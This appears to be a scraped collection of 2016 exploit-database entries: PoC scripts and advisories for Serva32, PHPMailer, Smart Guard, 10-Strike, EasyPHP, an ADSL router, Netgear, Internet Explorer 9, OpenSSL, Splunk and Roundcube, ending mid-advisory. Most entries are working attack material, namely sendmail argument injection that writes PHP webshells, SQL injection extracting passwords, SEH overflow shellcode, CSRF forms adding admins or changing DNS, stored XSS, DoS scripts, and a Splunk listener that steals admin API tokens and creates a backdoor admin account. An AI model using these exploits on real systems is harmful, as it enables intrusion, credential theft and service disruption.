# *** ERROR: Module load completed but symbols could not be loaded for C:\Users\lqwrm\Desktop\Serva_Community_32_v3.0.0\Serva32.exe
# eax=03127510 ebx=03127670 ecx=00000003 edx=00000000 esi=03127670 edi=031276a0
# eip=74a1c54f esp=03127510 ebp=03127560 iopl=0         nv up ei pl nz ac po nc
# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000212
# KERNELBASE!RaiseException+0x58:
# 74a1c54f c9              leave
# 0:013> kb
# # ChildEBP RetAddr  Args to Child              
# 00 03127560 004abaaf e06d7363 00000001 00000003 KERNELBASE!RaiseException+0x58
# WARNING: Stack unwind information not available. Following frames may be wrong.
# 01 03127598 004cc909 031275b8 005e13e8 6ca23755 Serva32+0xabaaf
# 02 03127608 004085d3 0211ecf8 03127670 ffffffff Serva32+0xcc909
# 03 0312761c 004089a5 031276a0 fffffffd 00000004 Serva32+0x85d3
# 04 0312764c 00408f01 03127670 fffffffd 00000004 Serva32+0x89a5
# 05 03127698 00413b38 00000000 0040007a 00000000 Serva32+0x8f01
# 06 031277d8 00000000 00000000 00000000 00000000 Serva32+0x13b38
#
# ----------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2016-5378
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5378.php
#
#
# 17.11.2016
#

import sys,socket

if len(sys.argv) < 3:

	print '\nUsage: ' + sys.argv[0] + ' <target> <port>\n'
	print 'Example: ' + sys.argv[0] + ' 172.19.0.214 80\n'
	sys.exit(0)
 
host = sys.argv[1]
port = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((host, port))
s.settimeout(251)
s.send('z')
s.close
HireHackking 
<?php

/*

PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)

Discovered/Coded by:

Dawid Golunski (@dawid_golunski)
https://legalhackers.com

Full Advisory URL:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html


A simple PoC (working on Sendmail MTA)

It will inject the following parameters to sendmail command:

Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fattacker\]
Arg no. 4 == [-oQ/tmp/]
Arg no. 5 == [-X/var/www/cache/phpcode.php]
Arg no. 6 == [some"@email.com]


which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
The resulting file will contain the payload passed in the body of the msg:

09607 <<< --b1_cb4566aa51be9f090d9419163e492306
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<< 
09607 <<< <?php phpinfo(); ?>
09607 <<< 
09607 <<< 
09607 <<< 
09607 <<< --b1_cb4566aa51be9f090d9419163e492306--


See the full advisory URL for details.

*/


// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form

$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com';
$msg_body  = "<?php phpinfo(); ?>";

// ------------------


// mail() param injection via the vulnerability in PHPMailer

require_once('class.phpmailer.php');
$mail = new PHPMailer(); // defaults to using php "mail()"

$mail->SetFrom($email_from, 'Client Name');

$address = "customer_feedback@company-X.com";
$mail->AddAddress($address, "Some User");

$mail->Subject    = "PHPMailer PoC Exploit CVE-2016-10033";
$mail->MsgHTML($msg_body);

if(!$mail->Send()) {
  echo "Mailer Error: " . $mail->ErrorInfo;
} else {
  echo "Message sent!\n";
}
    
?>
HireHackking 
# Exploit Title: SQL Injection In Smart Guard Network Manager Api
# Date: 03/12/2016
# Exploit Author: Rahul Raz
# Vendor Homepage: http://www.xsinfoways.com/
# Software Name: Smart Guard Network Manager
# Version: 6.3.2
# Tested on: Ubuntu Linux

Vulnerability type: CWE-89: Improper Neutralization of Special Elements
used in an SQL Command ('SQL Injection')

The menu_id GET parameter on <base url>/view_logs/search_all_history.php in
not filtered properly and leads to SQL Injection

Authentication Required: No

SQL injec type- error/xpath.

Any unauthenticated user can inject SQL commands on the <base-url>
/view_logs/search_all_history.php?menu_id=-466 and extractvalue(1,(select
make_set(511,0,SUBSTRING(password,1,20),1) from
login_master limit 0,1 ))-- -

So an user can fetch admin details and can easily get root on that server
if server is SmartGuard 6.0A Revolutions as php runs as user root by
default.
This this vulnerability can make whole server vulnerable .
HireHackking 
#!python
#####################################################################################
# Exploit title: 10-Strike Network File Search Pro 2.3 Registration code SEH exploit
# Date: 2016-12-10
# Vendor homepage: https://www.10-strike.com/network-file-search/help/pro.shtml
# Download: https://www.10-strike.com/network-file-search/network-file-search-pro.exe
# Tested on: Win7 SP1
# Author: malwrforensics
# Details: Help->Enter registration code... and paste the text from poc.txt
#####################################################################################

def write_poc(fname, buffer):
	fhandle = open(fname , 'wb')
	fhandle.write(buffer)
	fhandle.close()

fname="poc.txt"
buf = '\x41' * 0xfe0

#########################
# Shellcode
# MessageBox ad infinitum
#########################
shellcode = ("\x68\x24\x3F\x30\x41\x58\x35\x70\x41\x70"
"\x41\x50\x59\x68\x41\x41\x41\x41\x58\x35"
"\x41\x41\x41\x41\x50\x50\x50\x50\x51\xC3")

junk = '\x41' * 0x5e
jmp = '\xeb\x82\x41\x41'
nseh = '\xec\x14\x40\x00'
buffer = buf + shellcode + junk + jmp + nseh
write_poc(fname, buffer)
HireHackking 
Title: EasyPHP Devserver Insecure File Permissions Privilege Escalation
Application: EasyPHP Devserver
Versions Affected: 16.1
Vendor URL: http://www.easyphp.org/
Discovered by: Ashiyane Digital Security Team ~ Micle
Tested on: Windows 10 Professional x86
Bugs: Insecure File Permissions Privilege Escalation
Source: http://www.micle.ir/exploits/1003
Date: 10-Dec-2016

Description:
EasyPHP installs by default to "C:\Program Files\EasyPHP-Devserver-16.1" 
with very weak file permissions granting any
user full permission to the exe. This allows opportunity for code 
execution against any other user running the application.

Proof:
C:\Program Files\EasyPHP-Devserver-16.1>cacls run-easyphp-devserver.exe
C:\Program Files\EasyPHP-Devserver-16.1\run-easyphp-devserver.exe 
BUILTIN\Users:(ID)C
NT AUTHORITY\SYSTEM:(ID)F
                                   BUILTIN\Administrators:(ID)F
                                   APPLICATION PACKAGE AUTHORITY\ALL 
APPLICATION PACKAGES:(ID)R

Exploit:
Simply replace run-easyphp-devserver.exe and wait for execution.
HireHackking 
# Exploit Title: ARG-W4 ADSL Router - Multiple Vulnerabilities
# Date: 2016-12-11
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM 
# Tested on: Windows AND Linux
# Exploit Demo : http://persian-team.ir/showthread.php?tid=196

1 - Denial of Service

#!/usr/bin/python
import urllib2
import urllib

site=raw_input("Enter Url : ")
site=site+"/form2Upnp.cgi"
username='admin'
password='admin'
p = urllib2.HTTPPasswordMgrWithDefaultRealm()
p.add_password(None, site, username, password)
handler = urllib2.HTTPBasicAuthHandler(p)
opener = urllib2.build_opener(handler)
urllib2.install_opener(opener)

post = {'daemon':' ','ext_if':'pppoe+1','submit.htm?upnp.htm':'Send'}
data = urllib.urlencode(post)
try:
    html = urllib2.urlopen(site,data)
    print ("Done ! c_C")
except:
    print ("Done ! c_C")
	
2-1 Cross-Site Request Forgery (Add Admin)

<html>
  <body>
    <form action="http://192.168.1.1/form2userconfig.cgi" method="POST">
      USER:<input type="text" name="username" value="mobham" />
      <input type="hidden" name="privilege" value="2" />
      PWD:<input type="text" name="newpass" value="mobham" />
      RPWD:<input type="texr" name="confpass" value="mobham" />
      <input type="hidden" name="adduser" value="Add" />
      <input type="hidden" name="hiddenpass" value="" />
      <input type="hidden" name="submit&#46;htm&#63;userconfig&#46;htm" value="Send" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

2-2 Cross-Site Request Forgery (Change DNS)

<html>
  <body>
    <form action="http://192.168.1.1/form2Dns.cgi" method="POST">
      <input type="hidden" name="dnsMode" value="1" />
      DNS<input type="text" name="dns1" value="2&#46;2&#46;2&#46;2" />
      DNS 2<input type="text" name="dns2" value="1&#46;1&#46;1&#46;1" />
      DNS 3<input type="text" name="dns3" value="" />
      <input type="hidden" name="submit&#46;htm&#63;dns&#46;htm" value="Send" />
      <input type="hidden" name="save" value="Apply&#32;Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
HireHackking 
# Exploit Title: Netgear R7000 - XSS via. DHCP hostname
# Date: 11-12-2016
# Exploit Author: Vincent Yiu
# Contact: https://twitter.com/vysecurity
# Vendor Homepage: https://www.netgear.com/
# Category: Hardware / WebApp
# Version: V1.0.7.2_1.1.93 + LATEST to date
 
-Vulnerability
An user who has access to send DHCP via either VPN or Wireless connection can serve a host name with script tags to trigger XSS.

Could be potentially used to connect to open or guest WIFI hotspot and inject stored XSS into admin panel and steal cookie for authentication.

http://RouterIP/start.htm

Then visit the "view who's connected" page.
 
-Proof Of Concept
Set /etc/dhcp/dhclient.conf

send host-name "<script>alert('xss')</script>";
HireHackking 
<!--
Source: http://blog.skylined.nl/20161209001.html

Synopsis

A specially crafted web-page can trigger a memory corruption vulnerability in Microsoft Internet Explorer 9. I did not investigate this vulnerability thoroughly, so I cannot speculate on the potential impact or exploitability.

Known affected software and attack vectors

Microsoft Internet Explorer 9

An attacker would need to get a target user to open a specially crafted web-page. Disabling Java­Script should prevent an attacker from triggering the vulnerable code path.

Details

This bug was found back when I had very little knowledge and tools to do analysis on use-after-free bugs, so I have no details to share. In addition, EIP said they were already aware of the bug and provided no details, this issue appears to have been fixed before ZDI was able to look at it. I have included a number of reports created using a predecessor of Bug­Id below.

Repro.html:
-->

<html>
  <head>
    <script src="get­Element­Tree.js"></script>
    <script src="show.html"></script>
    <script>
      // First tag can be any inline but must NOT be closed yet
      // Second tag can be anything that's not inline.
      // "text1" can be anything
      document.write('<s><br>text1');
      // The tree is in good shape.
      show("DOM Tree after first write", get­Element­Tree(document.body));
      // At this point, it appears that MSIE is still waiting for the first tag from the first write to be closed.
      // Inserting a P tag using any of the "Justify*"-, "Indent"- or "Outdent"-exec­Commands will mess up the DOM tree,
      // specifically for the "Justify*"- and "Outdent"-exec­Command:
      // - the S tag will partially become a child of the P tag:
      //      P.last­Child == S (but P.child­Nodes = [BR, text1])
      // - the P tag will partially become a child of the S tag:
      //      S.first­Child == P and S.child­Nodes = [P] (but S.last­Child = text1)
      // - The P partially becomes a child of the BODY tag:
      //      BODY.last­Child = P (but BODY.first­Child = S and BODY.child­Nodes = [S])
      // (The situation is similar for "Indent", but includes a BLOCKQUOTE element)
      document.exec­Command('Select­All');
      document.exec­Command('Justify­Right');
      show("DOM Tree after outdent", get­Element­Tree(document.body));
      // At this point, MSIE is not yet crashing. However, another write will corrupt memory:
      document.write('text2');
      // You will probably not see this popup. If you do, it will display an obviously corrupt DOM element tree.
      show("DOM Tree after write", get­Element­Tree(document.body));
    </script>
  </head>
</html>


<!--
get­Element­Tree.js:

function get­Element­Tree(o­Root­Element, b­Include­All) {
  function get­Element­Name(o­Element) {
    return o­Element ? (o­Element.tag­Name || o­Element.node­Name + ':"' + o­Element.data + '"') : "null";
  }
  function get­Element­Tree­Lines(o­Element, o­Expected­Parent, o­Expected­Previous­Sibling, o­Expected­Next­Sibling,
      s­First­Line­Prefix, s­Sub­Lines­Prefix) {
    if (!o­Element) return [s­First­Line­Prefix + "null"];
    var ao­Children = o­Element.child­Nodes,
        s­Header = s­First­Line­Prefix + get­Element­Name(o­Element);
    try {
      if (o­Expected­Parent && o­Element.parent­Node != o­Expected­Parent)
          s­Header += " (parent:" + get­Element­Name(o­Element.parent­Node) + ")";
    } catch (e) {
      s­Header += " (parent error:" + e.message + ")"; 
    }
    try {
      if (o­Element.previous­Sibling != o­Expected­Previous­Sibling) {
        s­Header += " (previous­Sibling:" + get­Element­Name(o­Element.previous­Sibling) + ")";
        o­Expected­Previous­Sibling && ao­Should­Be­Included­Elements.push(o­Element.previous­Sibling);
      }
    } catch (e) {
      s­Header += " (previous­Sibling error:" + e.message + ")"; 
    }
    try {
      if (o­Element.next­Sibling != o­Expected­Next­Sibling) {
        s­Header += " (next­Sibling:" + get­Element­Name(o­Element.next­Sibling) + ")";
        o­Expected­Next­Sibling && ao­Should­Be­Included­Elements.push(o­Element.next­Sibling);
      }
    } catch (e) {
      s­Header += " (next­Sibling error:" + e.message + ")"; 
    }
    try {
      if (ao­Children.length > 0 && o­Element.first­Child != ao­Children.item(0)) {
        s­Header += " (first­Child:" + get­Element­Name(o­Element.first­Child) + ")";
        ao­Should­Be­Included­Elements.push(o­Element.first­Child);
      }
    } catch (e) {
      s­Header += " (first­Child error:" + e.message + ")"; 
    }
    for (var i = 0; i < ao­Actually­Included­Elements.length; i++) {
      if (ao­Actually­Included­Elements[i] == o­Element) {
        return [s­Header + " => previously referenced!"];
      }
    }
    var s­Last­Child­Error­Line = null;
    try {
      if (ao­Children.length > 0 && o­Element.last­Child != ao­Children.item(ao­Children.length - 1)) {
        s­Last­Child­Error­Line = s­Sub­Lines­Prefix + "\u2514 last­Child:" + get­Element­Name(o­Element.last­Child);
        ao­Should­Be­Included­Elements.push(o­Element.last­Child);
      }
    } catch (e) {
      s­Last­Child­Error­Line = s­Sub­Lines­Prefix + "\u2514 last­Child error:" + e.message;
    }
    ao­Actually­Included­Elements.push(o­Element);
    var as­Tree = [s­Header], o­Previous­Sibling = null;
    for (var i = 0; i < ao­Children.length; i++) {
      try {
        var o­Child = ao­Children.item(i)
      } catch (e) {
        as­Tree.push(s­Sub­Lines­Prefix + (i == ao­Children.length - 1 ? "\u255A" : "\u2560") + "child error:" + e.message);
        continue;
      }
      try {
        var o­Next­Sibling = i + 1 <= ao­Children.length - 1 ? ao­Children.item(i + 1) : null;
      } catch (e) {
        o­Next­Sibling = "error: " + e.message;
      }
      var as­Child­Tree = get­Element­Tree­Lines(o­Child, o­Element, o­Previous­Sibling, o­Next­Sibling, 
          s­Sub­Lines­Prefix + (i == ao­Children.length - 1 ? "\u255A" : "\u2560"),
          s­Sub­Lines­Prefix + (i == ao­Children.length - 1 ? (s­Last­Child­Error­Line ? "\u2502" : " ") : "\u2551"));
      o­Previous­Sibling = o­Child;
      for (j = 0; j < as­Child­Tree.length; j++) {
        as­Tree.push(as­Child­Tree[j]);
      }
    }
    if (s­Last­Child­Error­Line) {
      as­Tree.push(s­Last­Child­Error­Line);
    }
    return as­Tree;
  }
  var ao­Should­Be­Included­Elements = [o­Root­Element], ao­Actually­Included­Elements = []
  var as­Tree­Blocks = [];
  find_­next_­missing_­element:
  while(ao­Should­Be­Included­Elements.length) {
    var o­Should­Be­Included­Element = ao­Should­Be­Included­Elements.pop();
    for (var j = 0; j < ao­Actually­Included­Elements.length; j++) {
      if (o­Should­Be­Included­Element == ao­Actually­Included­Elements[j]) {
        continue find_­next_­missing_­element;
      }
    }
    as­Tree­Lines = get­Element­Tree­Lines(o­Should­Be­Included­Element, o­Should­Be­Included­Element.parent­Node,
        o­Should­Be­Included­Element.previous­Sibling, o­Should­Be­Included­Element.next­Sibling, 
        o­Should­Be­Included­Element.parent­Node ? "\u255A" : "",
        o­Should­Be­Included­Element.parent­Node ? " " : "");
    as­Tree­Blocks.push(as­Tree­Lines.join("\r\n"));
    if (!b­Include­All) break;
  }
  return as­Tree­Blocks.join("\r\n");
}


show.html:

//<!--
  function show(s­Title, s­Message) {
    show­Modal­Dialog("show.html", [s­Title, "<pre>" + s­Message + "</pre>"],
      "dialog­Width:800px; dialog­Height:600px; resizable:yes");
  }
/*-->
<script>
  document.body.inner­HTML = window.dialog­Arguments[1];
  document.title = window.dialog­Arguments[0];
</script>
<!-- */ // -->

Time-line

27 September 2012: This vulnerability was found through fuzzing.
7 November 2012: This vulnerability was submitted to EIP.
27 November 2012: This vulnerability was rejected by EIP.
28 November 2012: This vulnerability was submitted to ZDI.
Between December 2012 and February 2013: Microsoft addresses this vulnerability.
27 February 2012: This vulnerability was rejected by ZDI.
8 December 2016: Details of this vulnerability are released.
I would like to note that although ZDI did not acquire the vulnerability as it was patched before they could finish analysis, they did offer me ZDI reward points as a courtesy.
-->
HireHackking 
# Exploit Title: OpenSSL 1.1.0a & 1.1.0b Heap Overflow Remote DOS vulnerability
# Date: 11-12-2016
# Software Link: https://www.openssl.org/source/old/1.1.0/
# Exploit Author: Silverfox
# Contact: http://twitter.com/___Silverfox___
# Website: https://www.silverf0x00.com/
# CVE: CVE-2016-7054
# Category: Denial of Service
# Type: Remote
# Platform: Multiple

1. Description
   
Remote unauthenticated user can negotiate ChaCha20-Poly1305 cipher suites and send a message of sufficient length with a bad MAC to trigger the vulnerable code to zero out the heap space and force the vulnerable OpenSSL instance to crash.

https://blog.fortinet.com/2016/11/23/analysis-of-openssl-chacha20-poly1305-heap-buffer-overflow-cve-2016-7054 
https://www.silverf0x00.com/overview-of-mac-algorithms-fuzzing-tls-and-finally-exploiting-cve-2016-7054-part-1/
 
   
2. Proof of Concept
 
 a. Download and compile OpenSSL 1.1.0a or b
 b. Run OpenSSL with the following switches: ./openssl-1.1.0a/bin/openssl s_server -cipher 'DHE-RSA-CHACHA20-POLY1305' -key cert.key -cert cert.crt -accept 443 -www -tls1_2 -msg
 c. Download and run the exploit code (Under https://github.com/silverfoxy/tlsfuzzer package run test-cve-2016-7054.py at https://github.com/silverfoxy/tlsfuzzer/blob/master/scripts/test-cve-2016-7054.py)
 d. OpenSSL Instance crashes causing DOS

### Exploit Code ###
'''
 *  In no event shall the author be liable
 *  for any direct, indirect, incidential, special, exemplary or
 *  consequential damages, including, but not limited to, procurement
 *  of substitute goods or services, loss of use, data or profits or
 *  business interruption, however caused and on any theory of liability,
 *  whether in contract, strict liability, or tort, including negligence
 *  or otherwise, arising in any way out of the use of this software,
 *  even if advised of the possibility of such damage.
'''
from __future__ import print_function
import traceback
import sys

from tlsfuzzer.runner import Runner
from tlsfuzzer.messages import Connect, ClientHelloGenerator, \
        ClientKeyExchangeGenerator, ChangeCipherSpecGenerator, \
        FinishedGenerator, ApplicationDataGenerator, \
        fuzz_encrypted_message
from tlsfuzzer.expect import ExpectServerHello, ExpectCertificate, \
        ExpectServerHelloDone, ExpectChangeCipherSpec, ExpectFinished, \
        ExpectAlert, ExpectClose, ExpectServerKeyExchange

from tlslite.constants import CipherSuite, AlertLevel, AlertDescription

def usage() :
    return 'Usage ./{} Destination_IP Destination_Port'.format(sys.argv[0])

def main():
    if len(sys.argv) < 3:
        print(usage())
        return -1
    conversations = {}
    # 16 chars: POLY1305 tag 128 bit
    # Tampering one bit suffices to damage the mac
    # The payload has to be long enough to trigger heap overflow
    n = 15000
    fuzzes = [(-1, 1)]
    for pos, val in fuzzes:
        conversation = Connect(sys.argv[1], int(sys.argv[2]))
        node = conversation
        ciphers = [CipherSuite.TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256]
        node = node.add_child(ClientHelloGenerator(ciphers))
        node = node.add_child(ExpectServerHello())
        node = node.add_child(ExpectCertificate())
        node = node.add_child(ExpectServerKeyExchange())
        node = node.add_child(ExpectServerHelloDone())
        node = node.add_child(ClientKeyExchangeGenerator())
        node = node.add_child(ChangeCipherSpecGenerator())
        node = node.add_child(FinishedGenerator())
        node = node.add_child(ExpectChangeCipherSpec())
        node = node.add_child(ExpectFinished())
        node = node.add_child(fuzz_encrypted_message(
            ApplicationDataGenerator(b"GET / HTTP/1.0\n" + n * b"A" + b"\n\n"), xors={pos:val}))
        node = node.add_child(ExpectAlert(AlertLevel.fatal,
                                          AlertDescription.bad_record_mac))
        node = node.add_child(ExpectClose())

        conversations["XOR position " + str(pos) + " with " + str(hex(val))] = \
                conversation

    # run the conversation
    good = 0
    bad = 0

    for conversation_name in conversations:
        conversation = conversations[conversation_name]
        #print(conversation_name + "...")
        runner = Runner(conversation)
        res = True
        try:
            runner.run()
        except:
            print("Error while processing")
            print(traceback.format_exc())
            res = False
        if res:
            good+=1
            print("OK")
        else:
            bad+=1

    print("Test end")
    print("successful: {0}".format(good))
    print("failed: {0}".format(bad))

    if bad > 0:
        sys.exit(1)

if __name__ == "__main__":
	main()
### End of Exploit Code ###

3. Solution:
   
Update OpenSSL to version 1.1.0c or later, versions earlier than 1.1.0a are not affected by this vulnerability.
HireHackking 
'''
(    , )     (,
  .   '.' ) ('.    ',
   ). , ('.   ( ) (
  (_,) .'), ) _ _,
 /  _____/  / _  \    ____  ____   _____
 \____  \==/ /_\  \ _/ ___\/  _ \ /     \
 /       \/   |    \\  \__(  <_> )  Y Y  \
/______  /\___|__  / \___  >____/|__|_|  /
        \/         \/.-.    \/         \/:wq
                    (x.0)
                  '=.|w|.='
                  _=''"''=.

                presents..

Splunk Enterprise Server-Side Request Forgery
Affected versions: Splunk Enterprise <= 6.4.3

PDF:
http://security-assessment.com/files/documents/advisory/SplunkAdvisory.pdf

+-----------+
|Description|
+-----------+
The Splunk Enterprise application is affected by a server-side request
forgery vulnerability. This vulnerability can be exploited by an
attacker via social engineering or other vectors to exfiltrate
authentication tokens for the Splunk REST API to an external domain.

+------------+
|Exploitation|
+------------+
==Server-Side Request Forgery==

A server-side request forgery (SSRF) vulnerability exists in the Splunk
Enterprise web management interface within the Alert functionality. The
application parses user supplied data in the GET parameter ‘alerts_id’
to construct a HTTP request to the splunkd daemon listening on TCP port
8089. Since no validation is carried out on the parameter, an attacker
can specify an external domain and force the application to make a HTTP
request to an arbitrary destination host. The issue is aggravated by the
fact that the application includes the REST API token for the currently
authenticated user within the Authorization request header.

This vulnerability can be exploited via social engineering to obtain
unauthorized access to the Splunk REST API with the same privilege level
of the captured API token.

[POC SSRF LINK]
/en-US/alerts/launcher?eai%3Aacl.app=launcher&eai%3Aacl.owner=*&severity=*&alerts_id=[DOMAIN]&search=test

The proof of concept below can be used to listen for SSRF connections
and automatically create a malicious privileged user when an
administrative token is captured.

[POC - splunk-poc.py]
'''

from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import httplib
import ssl
import requests

token = ''

class MyHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        global token
        try:
            token = self.headers.get('Authorization')[7:]
            print "[+] Captured Splunk API token from GET request"
        except Exception, e:
            print "[-] No API token captured on incoming connection..."

def adminTokenNotCaptured():
    global token
    if token:
        query = "/services/authentication/httpauth-tokens/" + token
        conn = httplib.HTTPSConnection("<SPLUNK IP>", 8089,
context=ssl._create_unverified_context())
        conn.putrequest("GET", query)
        conn.putheader("Authorization", "Splunk %s" % token)
        conn.endheaders()
        context = conn.getresponse().read()
        if 'userName">admin' in context:
            print "[+] Confirmed Splunk API token belongs to admin user"
            print "[+] Admin Splunk API Token: %s" % token
            return False
        else:
            print "[!] Splunk API token does not belong to admin user"

    return True

def poc():
    global token
    create_user_uri = "https://<SPLUNK
IP>:8089/services/authentication/users"
    params = {'name': 'infosec', 'password': 'password', 'roles': 'admin'}
    auth_header = {'Authorization': 'Splunk %s' % token}
    requests.packages.urllib3.disable_warnings()
    response = requests.post(url=create_user_uri, data=params,
headers=auth_header, verify=False)
    if "<title>infosec" in response.content:
       print "[+] POC admin account 'infosec:password' successfully
created"
    else:
       print "[-] No account was created"
       print response.content

if __name__ == "__main__":
    try:
        print "[+] Starting HTTP Listener"
        server = HTTPServer(("", 8080), MyHandler)
        while adminTokenNotCaptured():
            server.handle_request()
        poc()
    except KeyboardInterrupt:
        print "[+] Stopping HTTP Listener"
        server.socket.close()

'''
+----------+
| Solution |
+----------+
Update to Splunk 6.5.0 or later. Full information about all patched
versions are provided in the reference links below.

+------------+
|  Timeline  |
+------------+
24/08/2016 – Initial disclosure to vendor
25/08/2016 – Vendor acknowledges receipt of the advisory and confirms
vulnerability.
28/09/2016 – Sent follow up email asking for status update
30/09/2016 – Vendor replies fixes are being backported to all supported
versions of the software.
10/11/2016 – Vendor releases security advisory and patched software versions
09/12/2016 – Public disclosure

+------------+
| Additional |
+------------+
http://security-assessment.com/files/documents/advisory/SplunkAdvisory.pdf
https://www.splunk.com/view/SP-CAAAPSR [SPL-128840]
'''
HireHackking 
<!--
Source: http://blog.skylined.nl/20161208001.html

Synopsis

A specially crafted web-page can trigger a memory corruption vulnerability in Microsoft Internet Explorer 9. I did not investigate this vulnerability thoroughly, so I cannot speculate on the potential impact or exploitability.

Known affected software and attack vectors

Microsoft Internet Explorer 9

An attacker would need to get a target user to open a specially crafted web-page. Java­Script does not appear to be required for an attacker to triggering the vulnerable code path.

Details

This bug was found back when I had very little knowledge and tools to do analysis on use-after-free bugs, so I have no details to share. The EIP provided me with some details of their analysis, which I'll paraphrase here: It is a use-after-free vulnerability where the span object in the frame.html file is reused after being freed. It appears to be impossible to reallocate the freed memory before it is reused. Part of the freed memory is overwritten when it is freed because a WORD Free­Entry­Offset value is stored at offset 0. This value is then used as part of a pointer to a vftable in order to call a method. This pointer now consist of the upper 16-bits of the old vftable and the lower 16-bits contain the Free­Entry­Offset value. Exploitation is near impossible without a way to have more control over this pointer in the freed memory block. ZDI also did a more thorough analysis and provide very similar details in their advisory. I have included a number of reports created using a predecessor of Bug­Id below.

Repro.html:
-->

<html>
  <body onload="location.reload();">
    <iframe src="Frame.html"></iframe>
  </body>
</html>

<!--
Frame.html:

<!doctype html>
<html>
  <head>
    <style type="text/css">
      .x{
        display:table-caption;
      }
      .x:first-line{
        text-transform:uppercase;
      }
    </style>
  </head>
  <body>
    <a>
      <span class="x">
        <a>
        </a>
      </span>
    </a>
  </body>
</html>


Time-line

27 September 2012: This vulnerability was found through fuzzing.
3 October 2012: This vulnerability was submitted to EIP.
11 October 2012: This vulnerability was rejected by EIP.
2 November 2012: This vulnerability was submitted to ZDI.
19 November 2012: This vulnerability was acquired by ZDI.
22 January 2013: This vulnerability was disclosed to Microsoft by ZDI.
29 May 2013: Microsoft addresses this vulnerability in MS13-037.
8 December 2016: Details of this vulnerability are released.
-->
HireHackking 
<!--
Source: http://blog.skylined.nl/20161207001.html

Synopsis

A specially crafted web-page can trigger a memory corruption vulnerability in Microsoft Internet Explorer 9. I did not investigate this vulnerability thoroughly, so I cannot speculate on the potential impact or exploitability.

Known affected software and attack vectors

Microsoft Internet Explorer 9

An attacker would need to get a target user to open a specially crafted web-page. Java­Script does not appear to be required for an attacker to triggering the vulnerable code path.

Details

This bug was found back when I had very little knowledge and tools to do analysis on use-after-free bugs, so I have no details to share. The ZDI did do a more thorough analysis and provide some details in their advisory. I have included a number of reports created using a predecessor of Bug­Id below.

Repro.html:
-->

<!doctype html>
<html>
  <head>
    <script>
      window.onload=function(){location.reload();};
    </script>
  </head>
  <body>
    <var>
      <img class="float" ismap="ismap" usemap="map"/>
      <map id="map"><area/></map>
      <dfn class="float"></dfn>
      <a class="float"></a>
      <input class="zoom"/>
      text
    </var>
    <q class="border float zoom" xml:space="preserve">  </q>
  </body>
  <style type="text/css">
  .float {
    float:left;
  }
  .zoom {
    zoom:3000%;
  }
  .border::first-letter {
    border-top:1px;
  }
  </style>
</html>

<!--
Time-line

1 November 2012: This vulnerability was found through fuzzing.
2 November 2012: This vulnerability was submitted to ZDI.
19 November 2012: This vulnerability was acquired by ZDI.
4 February 2013: This vulnerability was disclosed to Microsoft by ZDI.
29 May 2013: Microsoft addresses this vulnerability in MS13-037.
7 December 2016: Details of this vulnerability are released.
-->
HireHackking 
Roundcube 1.2.2: Command Execution via Email
============================================
You can find the online version of the advisory here:
https://blog.ripstech.com/2016/roundcube-command-execution-via-email/

Found by Robin Peraglie with RIPS

Introduction
------------
Roundcube is a widely distributed open-source webmail software used by
many organizations and companies around the globe. The mirror on
SourceForge, for example, counts more than 260,000 downloads in the last
12 months which is only a small fraction of the actual users. Once
Roundcube is installed on a server, it provides a web interface for
authenticated users to send and receive emails with their web browser.

Affected Versions: 1.0.0 - 1.2.2

Requirements
------------
- Roundcube must be configured to use PHP's mail() function (by default)
- PHP's mail() function is configured to use sendmail (by default)
- PHP is configured to have safe_mode turned off (by default)
- An attacker must know or guess the absolute path of the webroot

Description
-----------
In Roundcube 1.2.2, and earlier, user-controlled input flows unsanitized
into the fifth argument of a call to PHP's built-in function mail()
which is documented as security critical. The problem is that the
invocation of the mail() function will cause PHP to execute the sendmail
program. The fifth argument allows to pass arguments to this execution
which allows a configuration of sendmail. Since sendmail offers the -X
option to log all mail traffic in a file, an attacker can abuse this
option and spawn a malicious PHP file in the webroot directory of the
attacked server. The following code lines trigger the vulnerability.

program/steps/mail/sendmail.inc
********************************************************************************
$from = rcube_utils::get_input_value('_from', rcube_utils::INPUT_POST,
true, $message_charset);
⋮	
$sent = $RCMAIL->deliver_message($MAIL_MIME, $from, $mailto,$smtp_error,
$mailbody_file, $smtp_opts);
********************************************************************************

Here, the value of the POST parameter "_from" is fetched and Roundcube's
deliver_message() method is invoked with the value used as second
argument $from.

program/lib/Roundcube/rcube.php
********************************************************************************
public function deliver_message(&$message, $from, $mailto, &$error,
&$body_file = null, $options = null) {
	⋮
	if (filter_var(ini_get('safe_mode'), FILTER_VALIDATE_BOOLEAN))
		$sent = mail($to, $subject, $msg_body, $header_str);
	else
		$sent = mail($to, $subject, $msg_body, $header_str, "-f$from");
********************************************************************************

This method will then pass the $from parameter to a call of the mail()
function. The idea is to pass a custom "from" header to the sendmail
program via the "-f" option.

Proof of Concept
----------------
When an email is sent with Roundcube, the HTTP request can be
intercepted and altered. Here, the "_from" parameter can be modified in
order to place a malicious PHP file on the system.

********************************************************************************
example@example.com -OQueueDirectory=/tmp -X/var/www/html/rce.php
********************************************************************************

This allows an attacker to spawn a shell file "rce.php" in the web root
directory with the contents of the "_subject" parameter that can contain
PHP code. After performing the request, a file with the following
content is created:

********************************************************************************
04731 >>> Recipient names must be specified
04731 <<< To: squinty@localhost
04731 <<< Subject: <?php phpinfo(); ?>
